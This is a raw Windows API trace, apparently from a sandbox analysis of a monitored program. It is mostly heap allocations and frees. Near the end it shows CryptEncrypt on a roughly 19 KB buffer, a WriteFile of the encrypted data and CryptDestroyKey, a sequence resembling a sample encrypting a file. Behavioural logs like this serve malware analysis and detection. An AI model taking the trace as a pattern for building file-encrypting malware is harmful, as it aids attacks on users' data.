hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0151.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0151.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0151.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0151.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0151.748] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa468 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73aa0 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0151.749] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0151.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0151.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0151.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0151.751] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2d0 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0151.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.751] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0151.751] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab4138 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0151.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa468, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.754] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x4d1e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x4d20) returned 1 [0151.754] CharLowerBuffW (in: lpsz="byte[19744]", cchLength=0xb | out: lpsz="byte[19744]") returned 0xb [0151.755] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.755] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa528, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.755] CryptEncrypt (in: hKey=0x9e20b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ab4138*, pdwDataLen=0x8cef60*=0x4d1e, dwBufLen=0x4d20 | out: pbData=0x2ab4138*, pdwDataLen=0x8cef60*=0x4d20) returned 1 [0151.756] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.756] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.756] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.756] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.756] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.756] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.757] WriteFile (in: hFile=0x4f8, lpBuffer=0x2a9ee68*, nNumberOfBytesToWrite=0x4d20, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9ee68*, lpNumberOfBytesWritten=0x8cf5e4*=0x4d20, lpOverlapped=0x0) returned 1 [0151.759] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0151.759] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0151.759] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.759] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa300, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0151.759] CryptDestroyKey (hKey=0x9e20b8) returned 1 [0151.759] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.759] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.759] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.759] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.763] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.763] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.763] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.763] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.763] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.763] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.763] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.763] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.763] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.763] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd 